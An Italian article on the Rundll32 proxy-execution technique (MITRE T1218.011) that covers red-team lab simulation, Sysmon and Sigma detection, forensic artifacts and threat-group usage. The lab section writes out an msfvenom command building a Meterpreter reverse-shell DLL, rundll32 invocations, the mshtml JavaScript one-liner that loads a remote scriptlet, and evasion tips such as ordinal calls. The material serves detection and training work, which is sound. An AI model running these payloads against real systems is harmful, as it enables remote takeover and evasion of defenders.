Esecuzione Proxy via Rundll32: Signed Binary Proxy Execution: Rundll32 (T1218.011)

Il test di questa tecnica in ambiente lab è fondamentale per validare le capacità di detection del Blue Team. Rundll32 offre una superficie d'attacco ampia: ogni variante d'invocazione produce artefatti diversi e richiede regole distinte, quindi il Red Teamer deve coprire quanti più pattern possibile.

Esecuzione DLL classica. Il caso base prevede il caricamento di una DLL personalizzata con una funzione esportata. Per generare il payload si può usare msfvenom di Metasploit (open source):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f dll -o payload.dll

L'esecuzione avviene poi con:

rundll32.exe payload.dll,StartW

Nota il suffisso W: sfrutta il meccanismo di risoluzione Wide/ANSI documentato nella tecnica. Rundll32 cercherà prima StartWW, poi StartWA, infine StartW. Creare export multipli con suffissi W e A per le funzioni innocue è una tecnica di offuscamento testabile in lab.

Esecuzione per ordinale. Quando il malware non espone nomi di funzione leggibili, l'invocazione per numero ordinale elimina un indicatore prezioso per gli analisti:

rundll32.exe payload.dll,#1

Abuso di DLL di sistema. La campagna Operation Dream Job (C0022) condotta da Lazarus Group dimostra come si possa mascherare l'esecuzione con percorsi e nomi legittimi. Per simulare un pattern analogo, si può creare una DLL in una directory di sistema e invocarla con un path credibile:

rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db" ,CtrlPanel

JavaScript via mshtml. Questa variante, resa celebre dal malware Poweliks, consente l'esecuzione di script remoti senza mai scrivere un PE su disco. In ambiente lab isolato:

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:/test.sct")

Per servire il file .sct è sufficiente un semplice HTTP server Python. Questa variante è particolarmente rilevante perché genera traffico di rete in uscita da rundll32 — un indicatore ad alta fedeltà.

File CPL. I file Control Panel Item sono DLL rinominate che rundll32 esegue attraverso shell32.dll:

rundll32.exe shell32.dll,Control_RunDLL malicious.cpl

Il tool AtomicRedTeam (open source) contiene test atomici pronti per T1218.011 che coprono tutte queste varianti, ideali per esecuzioni automatizzate e ripetibili tramite il suo modulo PowerShell Invoke-AtomicTest.

Il monitoraggio di rundll32.exe è un esercizio di equilibrio: il processo viene invocato centinaia di volte al giorno in un ambiente enterprise tipico, quindi la detection deve essere chirurgica per evitare che gli analisti annegino nei falsi positivi.

La sorgente log primaria è Sysmon (open source), e i dati di detection indicano chiaramente i log WinEventLog:Sysmon come riferimento. Tre Event ID coprono l'intera catena d'attacco. L'EventID 1 (Process Create) cattura la command line completa di rundll32 e, soprattutto, il processo padre — un elemento critico per il tuning. L'EventID 7 (Image Loaded) rivela quali DLL vengono mappate in memoria dal processo. L'EventID 3 (Network Connection) segnala quando rundll32 effettua connessioni di rete, un comportamento quasi sempre anomalo per usi legittimi.

La strategia di detection si articola su tre livelli di priorità.

Alta fedeltà — alert immediato. Rundll32 che esegue contenuto JavaScript o accede a mshtml,RunHTMLApplication è quasi certamente malevolo. Lo stesso vale per connessioni di rete in uscita verso IP esterni, specialmente se il processo non ha una DLL legittima come argomento. La campagna Water Curupira Pikabot Distribution (C0037) mostra un pattern riconoscibile: rundll32 invocato con export denominati Crash o Limit, nomi insoliti facilmente intercettabili.

Media fedeltà — correlazione necessaria. Rundll32 lanciato da processi Office (WINWORD.EXE, EXCEL.EXE), da mshta.exe o da wscript.exe merita investigazione, ma richiede correlazione temporale. I parametri di tuning suggeriti includono una finestra di correlazione tra invocazione e caricamento DLL o attività di rete, generalmente configurabile tra 5 e 30 secondi.

Baseline — riduzione del rumore. Prima di attivare qualsiasi regola è indispensabile costruire una allowlist delle DLL che rundll32 carica normalmente nell'ambiente. Il parametro di tuning AllowedDLLs è essenziale: raccogliere 2-3 settimane di baseline consente di escludere i path legittimi (aggiornamenti software, driver, estensioni shell).

Per la prevenzione, la mitigazione M1050 (Exploit Protection) indica l'uso delle regole Attack Surface Reduction (ASR) di Microsoft Defender for Endpoint (incluso in licenze Microsoft 365 E5 o come add-on a pagamento). La regola ASR specifica blocca i metodi di abuso di rundll32 per bypassare l'application control. La configurazione avviene via Group Policy o Intune, ed è fortemente raccomandata come controllo compensativo.

Il progetto Sigma (open source) fornisce regole predefinite per le varianti più comuni di abuso di rundll32, convertibili nei formati di query del proprio SIEM tramite il converter ufficiale.

Quando rundll32 compare in un'indagine, la sfida non è trovarlo — è distinguere le invocazioni legittime da quelle malevole e ricostruire la catena causale completa. L'analisi parte da tre famiglie di artefatti.

Prefetch e timeline di esecuzione. Il file RUNDLL32.EXE-xxxxxxxx.pf nella directory C:\Windows\Prefetch contiene la lista delle DLL caricate nelle ultime esecuzioni e i timestamp associati. Incrociando questi dati con la Master File Table ($MFT) si può determinare se la DLL payload è stata creata poco prima dell'invocazione — un pattern tipico del malware drop-and-execute. Lo strumento PECmd di Eric Zimmerman (open source) permette di parsare i file Prefetch:

PECmd.exe -f "C:\Windows\Prefetch\RUNDLL32.EXE-xxxxxxxx.pf" --csv output_dir

Registry persistence. Numerose famiglie malware — Bisonal, ADVSTORESHELL, Briba, Kwampirs, Mosquito, Matryoshka — abusano di rundll32 inserendolo come valore nei Registry Run Key per garantire la persistenza al riavvio. L'analista deve esaminare sistematicamente le chiavi HKCU\Software\Microsoft\Windows\CurrentVersion\Run e HKLM equivalente, cercando valori che contengano "rundll32" seguito da DLL in percorsi non standard. Lo strumento RECmd (open source) di Zimmerman consente l'analisi batch degli hive di registro esportati.

Analisi della DLL payload. Una volta identificata la DLL caricata da rundll32, l'analisi degli export è cruciale. Il campo delle funzioni esportate può rivelare nomi offuscati, ordinali senza nome, o il pattern W/A descritto nella tecnica. Lo strumento pe-sieve (open source) consente di scansionare un processo in esecuzione alla ricerca di moduli iniettati o hollowed, mentre dumpbin (incluso in Visual Studio) mostra la tabella degli export:

dumpbin /exports suspicious.dll

Artefatti di rete. Per le varianti che eseguono JavaScript o scaricano SCT remoti, i log del proxy web e le cache DNS del sistema diventano fonti critiche. L'EventID 3 di Sysmon, se abilitato al momento dell'incidente, fornisce IP di destinazione e porta. La campagna C0021 e il SolarWinds Compromise (C0024) dimostrano l'uso di rundll32 per caricare beacon Cobalt Strike, che generano traffico C2 riconoscibile nei log di rete tramite i profili di comunicazione malleable.

La timeline tipica di un attacco via rundll32 segue lo schema: arrivo del payload (phishing, download) → scrittura DLL su disco → invocazione rundll32 con argomenti → eventuale persistenza via Registry → comunicazione C2. Ogni step lascia artefatti verificabili incrociando $MFT, Prefetch, Registry e log Sysmon.

Con 26 gruppi documentati, rundll32 è una tecnica trasversale a regioni, motivazioni e livelli di sofisticazione. L'analisi dei pattern d'uso rivela però differenze tattiche significative che aiutano l'attribuzione.

APT28 (Russia, cyber-espionage) utilizza rundll32 come vettore primario per il proprio impianto CHOPSTICK (ADVSTORESHELL/CORESHELL), con invocazioni che referenziano DLL posizionate in directory di sistema con nomi mimetici come twain_64.dll. L'uso è sistematico e multi-stadio: un loader Trojan salva uno script batch che a sua volta chiama rundll32 per la DLL payload finale. Questa catena a tre livelli è un indicatore stilistico del gruppo.

Lazarus Group (Corea del Nord, cyber-espionage e financial gain) mostra un uso particolarmente sofisticato nella campagna Operation Dream Job (C0022), dove rundll32 caricava file con estensioni non standard (.db) da percorsi apparentemente legittimi (C:\ProgramData\ThumbNail\thumbnail.db) con parametri strutturati che simulavano identificatori di sessione. Questo livello di attenzione all'OPSEC distingue Lazarus da gruppi meno disciplinati.

Sandworm Team (Russia, sabotaggio) ha impiegato rundll32 nella campagna 2015 Ukraine Electric Power Attack (C0028) come meccanismo di esecuzione per backdoor all'interno di infrastrutture critiche. L'abbinamento con BlackEnergy3 e KillDisk indica un uso orientato alla distruzione piuttosto che all'esfiltrazione.

APT41 (Cina, dual-purpose espionage/financial) e Kimsuky (Corea del Nord, espionage) condividono l'uso di rundll32 come loader generico, ma con payload diversi: APT41 lo impiega per caricare loader custom, mentre Kimsuky lo usa per eseguire script malevoli direttamente, suggerendo un toolkit meno maturo.

Wizard Spider (cybercrime, ransomware) ha introdotto una variante interessante: rundll32 combinato con WebDAV per deployare comandi ransomware, eliminando la necessità di scrivere la DLL su disco locale. Questo pattern è coerente con l'ecosistema ransomware-as-a-service e si ritrova nelle campagne C0015 (Bazar/Cobalt Strike/Conti) e C0018 (AvosLocker), dove rundll32 serve come ponte tra il loader iniziale e gli strumenti post-exploitation come Cobalt Strike e Mimikatz.

Il trend emergente vede il consolidamento di rundll32 come "colla operativa" tra le fasi di initial access e post-exploitation: gruppi eterogenei come FIN7, TA505, TA551 e MuddyWater lo adottano tutti con la stessa logica — eseguire la prima DLL del proprio toolchain sfruttando la fiducia implicita che i difensori accordano ai binari firmati Microsoft.

Framework MITRE ATT&CK: T1218.011, TA0005, M1050. Campagne: C0022 (Operation Dream Job), C0021, C0015, C0024 (SolarWinds Compromise), C0028 (2015 Ukraine Electric Power Attack), C0005 (Operation Spalax), C0037 (Water Curupira Pikabot Distribution), C0018. Tool di detection: Sysmon, Sigma, PECmd, RECmd, pe-sieve. Integrato con conoscenza professionale per tool e procedure operative.